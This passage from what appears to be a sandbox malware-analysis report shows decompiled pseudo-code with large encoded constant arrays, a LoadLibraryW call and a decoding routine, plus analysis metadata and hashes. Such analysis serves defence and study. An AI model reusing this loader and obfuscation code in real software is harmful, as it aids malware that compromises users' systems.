                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				char _v1428;
                  
                  				_v1428 = 0x35afd9ed;
                  				_v1424 = 0xb2bb3fd1;
                  				_v1420 = 0xc54e001f;
                  				_v1416 = 0x464bd289;
                  				_v1412 = 0xa62e3cd5;
                  				_v1408 = 0x10828f30;
                  				_v1404 = 0xd759c3e6;
                  				_v1400 = 0x3226a1eb;
                  				_v1396 = 0x93d3719f;
                  				_v1392 = 0xff1d7368;
                  				_v1388 = 0x4cf80263;
                  				_v1384 = 0x1220b21a;
                  				_v1380 = 0x9e299973;
                  				_v1376 = 0x8c93726d;
                  				_v1372 = 0x388d0cca;
                  				_v1368 = 0x63dd4a40;
                  				_v1364 = 0x63312a98;
                  				_v1360 = 0xc54ade8b;
                  				_v1356 = 0x57b31f78;
                  				_v1352 = 0xbaef0446;
                  				_v1348 = 0xa5fb8b92;
                  				_v1344 = 0x7ac55a38;
                  				_v1340 = 0xa13c21f;
                  				_v1336 = 0x77bc5b0d;
                  				_v1332 = 0x6b48a641;
                  				_v1328 = 0xc939f5fe;
                  				_v1324 = 0xf80f5b16;
                  				_v1320 = 0xc75ec705;
                  				_v1316 = 0xdba5663;
                  				_v1312 = 0x4213a67f;
                  				_v1308 = 0x3de4493c;
                  				_v1304 = 0xd6231f80;
                  				_v1300 = 0x68067b7;
                  				_v1296 = 0xc082ec40;
                  				_v1292 = 0xa5d2a512;
                  				_v1288 = 0x5f226fcb;
                  				_v1284 = 0x9a62d466;
                  				_v1280 = 0x2dcc9250;
                  				_v1276 = 0x68432153;
                  				_v1272 = 0xe57fc7e;
                  				_v1268 = 0xf9c65141;
                  				_v1264 = 0x74e9465;
                  				_v1260 = 0xa6dac4aa;
                  				_v1256 = 0x35a3c1f;
                  				_v1252 = 0xa3662753;
                  				_v1248 = 0xf78554cb;
                  				_v1244 = 0xa9ba3f97;
                  				_v1240 = 0xa7034e35;
                  				_v1236 = 0xfefc68e9;
                  				_v1232 = 0xf512b31a;
                  				_v1228 = 0x7483c20;
                  				_v1224 = 0x36b5f632;
                  				_v1220 = 0x38c31e64;
                  				_v1216 = 0x4c62f726;
                  				_v1212 = 0x99ba6132;
                  				_v1208 = 0x323bd5bb;
                  				_v1204 = 0xd06b8129;
                  				_v1200 = 0x58ac925d;
                  				_v1196 = 0x14258239;
                  				_v1192 = 0x74c7fcd7;
                  				_v1188 = 0x5b658ef1;
                  				_v1184 = 0xfef3ed92;
                  				_v1180 = 0xd6897bdd;
                  				_v1176 = 0xe3ae805d;
                  				_v1172 = 0xd7dd3c6a;
                  				_v1168 = 0xcf62f53e;
                  				_v1164 = 0x10086fbc;
                  				_v1160 = 0xb950e66;
                  				_v1156 = 0x1f978099;
                  				_v1152 = 0xa5187c45;
                  				_v1148 = 0xe4f386b;
                  				_v1144 = 0xa997fe6d;
                  				_v1140 = 0x39d08a92;
                  				_v1136 = 0xfb10c42f;
                  				_v1132 = 0x58d93c66;
                  				_v1128 = 0x4cf30038;
                  				_v1124 = 0xa31aa9f3;
                  				_v1120 = 0xa932cf52;
                  				_v1116 = 0x2451a583;
                  				_v1112 = 0xeb831842;
                  				_v1108 = 0x59b79230;
                  				_v1104 = 0x47744230;
                  				_v1100 = 0xd450fcea;
                  				_v1096 = 0x1959a718;
                  				_v1092 = 0x6585da84;
                  				_v1088 = 0xf7b8a766;
                  				_v1084 = 0xa8e739d6;
                  				_v1080 = 0x25491a58;
                  				_v1076 = 0x41855178;
                  				_v1072 = 0xae9aad57;
                  				_v1068 = 0x913a6b1b;
                  				_v1064 = 0xf5bfdaf1;
                  				_v1060 = 0xe0413efd;
                  				_v1056 = 0x2a6692be;
                  				_v1052 = 0xae364f54;
                  				_v1048 = 0xa4910d06;
                  				_v1044 = 0xac37d2e2;
                  				_v1040 = 0x1f0ed562;
                  				_v1036 = 0xf8313c8;
                  				_v1032 = 0x1696917a;
                  				_v1028 = 0x4ba4c9c6;
                  				_v1024 = 0xca70992d;
                  				_v1020 = 0x88f129d4;
                  				_v1016 = 0x8986dfc9;
                  				_v1012 = 0x8077495d;
                  				_v1008 = 0x7f188a07;
                  				_v1004 = 0x7068997b;
                  				_v1000 = 0x5f73f18e;
                  				_v996 = 0x7079116d;
                  				_v992 = 0xf12893f0;
                  				_v988 = 0x2e1e137f;
                  				_v984 = 0x9c8a1308;
                  				_v980 = 0x63f7f786;
                  				_v976 = 0x82df7bd;
                  				_v972 = 0xb3225a87;
                  				_v968 = 0xd1bde73d;
                  				_v964 = 0x59885592;
                  				_v960 = 0xc427fd32;
                  				_v956 = 0x9d169c5c;
                  				_v952 = 0x6e01ebf2;
                  				_v948 = 0x9c5f68a9;
                  				_v944 = 0x559de137;
                  				_v940 = 0x45953cbd;
                  				_v936 = 0xd84853c;
                  				_v932 = 0x65edd287;
                  				_v928 = 0xef673b85;
                  				_v924 = 0x7fa3edf8;
                  				_v920 = 0x83ba664c;
                  				_v916 = 0xac287487;
                  				_v912 = 0x4d8c6e16;
                  				_v908 = 0xd6774e7a;
                  				_v904 = 0x6a742a14;
                  				_v900 = 0x7b41d554;
                  				_v896 = 0x3583a68f;
                  				_v892 = 0xb64620eb;
                  				_v888 = 0x968e295c;
                  				_v884 = 0x1f2a9f33;
                  				_v880 = 0x20c95888;
                  				_v876 = 0x3ad04588;
                  				_v872 = 0x1f3f3349;
                  				_v868 = 0x8bc63238;
                  				_v864 = 0x72dfdb8b;
                  				_v860 = 0x3c084d40;
                  				_v856 = 0xa03b21f2;
                  				_v852 = 0x975b711;
                  				_v848 = 0x66143377;
                  				_v844 = 0xb0ef4486;
                  				_v840 = 0x9536b870;
                  				_v836 = 0xad0c8488;
                  				_v832 = 0xfa93b301;
                  				_v828 = 0x625273d4;
                  				_v824 = 0x2130da0b;
                  				_v820 = 0x21682fc7;
                  				_v816 = 0x125bacd0;
                  				_v812 = 0x8d655941;
                  				_v808 = 0x7ea7e90a;
                  				_v804 = 0x998bb919;
                  				_v800 = 0x4a680a7;
                  				_v796 = 0x4dc5c9aa;
                  				_v792 = 0x6f4d8b33;
                  				_v788 = 0xfff2694d;
                  				_v784 = 0x7ad03f4c;
                  				_v780 = 0xec728f7e;
                  				_v776 = 0xbd5f0efc;
                  				_v772 = 0x39972492;
                  				_v768 = 0x8a22d400;
                  				_v764 = 0xc9e812c9;
                  				_v760 = 0xd9c8e7;
                  				_v756 = 0x783a029e;
                  				_v752 = 0xf55a1b2b;
                  				_v748 = 0x39a441d8;
                  				_v744 = 0xfddcd3b7;
                  				_v740 = 0xa8d3ee78;
                  				_v736 = 0xb71d00d8;
                  				_v732 = 0xd8f1a5e0;
                  				_v728 = 0x171f9db;
                  				_v724 = 0x608a96cb;
                  				_v720 = 0x5db98275;
                  				_v716 = 0x8e64ca5b;
                  				_v712 = 0x8224c5bb;
                  				_v708 = 0xf3e18a45;
                  				_v704 = 0x9fa69ab2;
                  				_v700 = 0x9858a1cb;
                  				_v696 = 0x20254080;
                  				_v692 = 0xc5a28d75;
                  				_v688 = 0xa7e533b4;
                  				_v684 = 0xb3f2eb4f;
                  				_v680 = 0xf3eab420;
                  				_v676 = 0xe26b573a;
                  				_v672 = 0x36939b06;
                  				_v668 = 0xce10ed67;
                  				_v664 = 0xaa9683c0;
                  				_v660 = 0x62293a60;
                  				_v656 = 0x1d84933a;
                  				_v652 = 0xad1d5e99;
                  				_v648 = 0x85c61e4e;
                  				_v644 = 0x5b995538;
                  				_v640 = 0x8d8b2cb;
                  				_v636 = 0xa9e61fda;
                  				_v632 = 0x9cd95a2d;
                  				_v628 = 0x8a651418;
                  				_v624 = 0x98b050c0;
                  				_v620 = 0x40e286e5;
                  				_v616 = 0x1619f260;
                  				_v612 = 0xb4bdd31f;
                  				_v608 = 0xb99d071c;
                  				_v604 = 0x125c63d2;
                  				_v600 = 0x2b37c664;
                  				_v596 = 0x82586a06;
                  				_v592 = 0x68bb79f8;
                  				_v588 = 0xde917f5e;
                  				_v584 = 0x13cb2094;
                  				_v580 = 0x4e37c720;
                  				_v576 = 0x6a7f746d;
                  				_v572 = 0xd082913f;
                  				_v568 = 0xbf74de13;
                  				_v564 = 0xa80f39b0;
                  				_v560 = 0xd992575e;
                  				_v556 = 0x68739177;
                  				_v552 = 0x3f37384b;
                  				_v548 = 0x18bc988d;
                  				_v544 = 0x46cd9d63;
                  				_v540 = 0xf4719ae3;
                  				_v536 = 0xf64f55e0;
                  				_v532 = 0x87d9f1a7;
                  				_v528 = 0x8f398c60;
                  				_v524 = 0x8cb94234;
                  				_v520 = 0xbbea7dd7;
                  				_v516 = 0xb9b8b1df;
                  				_v512 = 0xaa28a9fc;
                  				_v508 = 0xf0af87ff;
                  				_v504 = 0x8dd7ca67;
                  				_v500 = 0xe2b550c4;
                  				_v496 = 0xd32bc033;
                  				_v492 = 0x948a965f;
                  				_v488 = 0x8851f930;
                  				_v484 = 0x8f5ccc1;
                  				_v480 = 0x6164f669;
                  				_v476 = 0x33510924;
                  				_v472 = 0xcb43e698;
                  				_v468 = 0x6ce52a33;
                  				_v464 = 0xa66f015c;
                  				_v460 = 0x7718680d;
                  				_v456 = 0x9d1df3bc;
                  				_v452 = 0x2a00c920;
                  				_v448 = 0x91fb3000;
                  				_v444 = 0x10c81bc3;
                  				_v440 = 0xf8a75bf2;
                  				_v436 = 0x5ae0234a;
                  				_v432 = 0xf98cf7ec;
                  				_v428 = 0x5fc46df;
                  				_v424 = 0xca1b041b;
                  				_v420 = 0x2790b2c6;
                  				_v416 = 0x54daa301;
                  				_v412 = 0x138923a3;
                  				_v408 = 0x301c0cdf;
                  				_v404 = 0x38e0a856;
                  				_v400 = 0xf03451b0;
                  				_v396 = 0x99e431f5;
                  				_v392 = 0x11281ac6;
                  				_v388 = 0xcf2342ab;
                  				_v384 = 0x9eab3b39;
                  				_v380 = 0x9ae3e3f1;
                  				_v376 = 0x1a6c98f3;
                  				_v372 = 0x68813b1b;
                  				_v368 = 0x192d795a;
                  				_v364 = 0x40d247a5;
                  				_v360 = 0x72cd97b3;
                  				_v356 = 0x67b5cebb;
                  				_v352 = 0x72e3ccbf;
                  				_v348 = 0x6f4c2d5b;
                  				_v344 = 0x9e6a8356;
                  				_v340 = 0x49e92bba;
                  				_v336 = 0x4f743d77;
                  				_v332 = 0x153393e1;
                  				_v328 = 0x13614add;
                  				_v324 = 0x69ce03ee;
                  				_v320 = 0x854a7485;
                  				_v316 = 0x3d8d4e01;
                  				_v312 = 0x326ab68;
                  				_v308 = 0x1099a027;
                  				_v304 = 0xf0ad3f63;
                  				_v300 = 0xef67c339;
                  				_v296 = 0x48f2e773;
                  				_v292 = 0x20c73ca2;
                  				_v288 = 0x3ce286cb;
                  				_v284 = 0xc256b288;
                  				_v280 = 0x5313123f;
                  				_v276 = 0x298713bc;
                  				_v272 = 0xa00fff1e;
                  				_v268 = 0x712c154;
                  				_v264 = 0x8dfdabca;
                  				_v260 = 0x1b118de3;
                  				_v256 = 0x41128fd1;
                  				_v252 = 0x6de2b7e3;
                  				_v248 = 0x5024cd33;
                  				_v244 = 0x6abdc573;
                  				_v240 = 0x1c49177e;
                  				_v236 = 0x21386a4d;
                  				_v232 = 0x93f5651f;
                  				_v228 = 0xc73e8d48;
                  				_v224 = 0x3cac36f9;
                  				_v220 = 0x2d121512;
                  				_v216 = 0xa1b212f1;
                  				_v212 = 0x9129c71a;
                  				_v208 = 0x4db0cfdf;
                  				_v204 = 0xd654f2c6;
                  				_v200 = 0x16901ffd;
                  				_v196 = 0x81f89533;
                  				_v192 = 0x1b05c4c7;
                  				_v188 = 0x5eca920e;
                  				_v184 = 0x7724293;
                  				_v180 = 0x500c8610;
                  				_v176 = 0x55e5490d;
                  				_v172 = 0x62084e15;
                  				_v168 = 0xcf1eef0a;
                  				_v164 = 0xc774a676;
                  				_v160 = 0xae26a56e;
                  				_v156 = 0xcd297ae8;
                  				_v152 = 0x4142669a;
                  				_v148 = 0x7a1cc234;
                  				_v144 = 0x9b8e60b1;
                  				_v140 = 0xb4c16bb9;
                  				_v136 = 0x346d9962;
                  				_v132 = 0x84307aeb;
                  				_v128 = 0x7110f065;
                  				_v124 = 0x6a478088;
                  				_v120 = 0x5dc95d88;
                  				_v116 = 0x7073454d;
                  				_v112 = 0xacd929e4;
                  				_v108 = 0xde22b221;
                  				_v104 = 0x16e6327;
                  				_v100 = 0x9149dc8;
                  				_v96 = 0xe2880d33;
                  				_v92 = 0x2b179b1c;
                  				_v88 = 0xdea65404;
                  				_v84 = 0xf8875bcd;
                  				_v80 = 0x4b33baa9;
                  				_v76 = 0xb8f51a63;
                  				_v72 = 0x100f3977;
                  				_v68 = 0x86e5080f;
                  				_v64 = 0x39c92f99;
                  				_v60 = 0xd5b96d4e;
                  				_v56 = 0x4c99974;
                  				_v52 = 0x32225531;
                  				_v48 = 0xe94abe7a;
                  				_v44 = 0x45a4729;
                  				_v40 = 0xe5478378;
                  				_v36 = 0x67de8f40;
                  				_v32 = 0x9ef8aa84;
                  				_v28 = 0xb07d4bc5;
                  				_v24 = 0xa2696d4;
                  				_v20 = 0x57bd9265;
                  				_v16 = 0x5cb55045;
                  				_v12 = 0x686aeb99;
                  				_v8 = 0xd8fb779c;
                  				_t367 = E00401A52(0x412830, 0x72fc3a35);
                  				 *0x416500 = LoadLibraryW(_t358);
                  				L00401B09(_t367);
                  				_push(0x415f50);
                  				_push(0x15bf801c);
                  				return E004012FF( *0x416500,  &_v1428, 0x164);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 0040C459
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: IU$$Q3$0BtG$1U"2$3*l$8$:Wk$<I=$J#Z$K87?$MEsp$Mj8!$S!Ch$[-Lo$`:)b$w=tO
                  • API String ID: 1029625771-1041004230
                  • Opcode ID: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction ID: 9a6b7aac7a66a4a18d8d0bcd4942d35e4a44c5d677b151ec7ad78da889033333
                  • Opcode Fuzzy Hash: a6161a9d4aafef99e67fba5a3ea7ffe1bb0866b570629b60a20c1477af4adfba
                  • Instruction Fuzzy Hash: FD52A5F48567698BDB618F459E897CEBA74BB11304FA096C8C25D3B214CB740BC6CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 82%
                  			E00409BFD(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				char _v704;
                  
                  				_v704 = 0xf893fe23;
                  				_v700 = 0x96a93579;
                  				_v696 = 0x245c2aae;
                  				_v692 = 0xf26b8a8f;
                  				_v688 = 0x14c1b027;
                  				_v684 = 0xe0f0703e;
                  				_v680 = 0x88b3d872;
                  				_v676 = 0xa84285a9;
                  				_v672 = 0x47a43a6c;
                  				_v668 = 0xf852e92a;
                  				_v664 = 0xe5dfba2e;
                  				_v660 = 0xd7c59fdb;
                  				_v656 = 0xc3cbda99;
                  				_v652 = 0xcb41f718;
                  				_v648 = 0x6a64f5c4;
                  				_v644 = 0xdedf71d9;
                  				_v640 = 0xc4de6aec;
                  				_v636 = 0xfadcabb3;
                  				_v632 = 0x51f000a9;
                  				_v628 = 0x9adea939;
                  				_v624 = 0xb06b7dbe;
                  				_v620 = 0x2357ceb6;
                  				_v616 = 0x35749835;
                  				_v612 = 0x24a62c8;
                  				_v608 = 0x5593220e;
                  				_v604 = 0x3bac3701;
                  				_v600 = 0x3ed279c7;
                  				_v596 = 0xc38eec75;
                  				_v592 = 0xaa787b27;
                  				_v588 = 0xe66cbef7;
                  				_v584 = 0x3eba0d2d;
                  				_v580 = 0x80721929;
                  				_v576 = 0x647cf0de;
                  				_v572 = 0x6b060840;
                  				_v568 = 0xdb744423;
                  				_v564 = 0x56120815;
                  				_v560 = 0x16cc448e;
                  				_v556 = 0xaf1d3a70;
                  				_v552 = 0x84afcece;
                  				_v548 = 0x1f5b2bac;
                  				_v544 = 0x84987065;
                  				_v540 = 0x923c41c0;
                  				_v536 = 0x62b2d1f2;
                  				_v532 = 0x96e98167;
                  				_v528 = 0x6b9c643e;
                  				_v524 = 0x3bf32bb7;
                  				_v520 = 0x926b56ed;
                  				_v516 = 0xb2212760;
                  				_v512 = 0x3029804a;
                  				_v508 = 0x17afbdc1;
                  				_v504 = 0xe5215b81;
                  				_v500 = 0xa9a73174;
                  				_v496 = 0x38362969;
                  				_v492 = 0x2014a2e5;
                  				_v488 = 0x9bd1543c;
                  				_v484 = 0x9f02550a;
                  				_v480 = 0x70771f01;
                  				_v476 = 0xf57f7493;
                  				_v472 = 0xc2432019;
                  				_v468 = 0xfbc35934;
                  				_v464 = 0x7eef6c55;
                  				_v460 = 0xe5a1e850;
                  				_v456 = 0x95e16117;
                  				_v452 = 0x24148e16;
                  				_v448 = 0x7e86f567;
                  				_v444 = 0xd337dcd3;
                  				_v440 = 0xf1e0035b;
                  				_v436 = 0x7c2fa058;
                  				_v432 = 0xf68afb41;
                  				_v428 = 0xe89fcfb5;
                  				_v424 = 0x58132f2e;
                  				_v420 = 0xeb09708a;
